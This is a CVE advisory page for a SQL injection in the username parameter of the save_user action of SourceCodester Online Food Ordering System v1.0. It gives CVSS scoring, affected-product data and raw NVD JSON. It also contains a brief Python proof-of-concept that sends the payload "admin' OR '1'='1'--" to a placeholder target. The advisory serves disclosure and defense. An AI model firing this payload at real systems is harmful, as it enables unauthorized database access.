Security Vulnerability Report
CVE-2026-30529 CVSS 8.8 HIGH

CVE-2026-30529

Published: 2026-03-27 16:16:23
Last Modified: 2026-03-30 17:21:20

Description

A SQL Injection vulnerability exists in SourceCodester Online Food Ordering System v1.0 in the Actions.php file (specifically the save_user action). The application fails to properly sanitize user input supplied to the "username" parameter. This allows an authenticated attacker to inject malicious SQL commands.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:oretnom23:online_food_ordering_system:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Online Food Ordering System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL example
target_url = "http://target.com/Actions.php"

# Malicious payload for username parameter
payload = {
    "action": "save_user",
    "username": "admin' OR '1'='1'--",  # SQL Injection payload
    "password": "test123"
}

# Cookies for authenticated session (Required as PR:L)
cookies = {
    "PHPSESSID": "authenticated_session_id_here"
}

try:
    response = requests.post(target_url, data=payload, cookies=cookies)
    if response.status_code == 200:
        print("Request sent successfully.")
        print("Response:", response.text)
except Exception as e:
    print(f"An error occurred: {e}")

References

https://github.com/meifukun/Web-Security-PoCs/blob/main/Online-Food-Ordering-System/SQLi-Actions-saveUser-username.md (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30529", "sourceIdentifier": "[email protected]", "published": "2026-03-27T16:16:23.447", "lastModified": "2026-03-30T17:21:20.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL Injection vulnerability exists in SourceCodester Online Food Ordering System v1.0 in the Actions.php file (specifically the save_user action). The application fails to properly sanitize user input supplied to the \"username\" parameter. This allows an authenticated attacker to inject malicious SQL commands."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oretnom23:online_food_ordering_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "0FAA9C4A-10ED-4AA4-8295-F4324DD2F879"}]}]}], "references": [{"url": "https://github.com/meifukun/Web-Security-PoCs/blob/main/Online-Food-Ordering-System/SQLi-Actions-saveUser-username.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}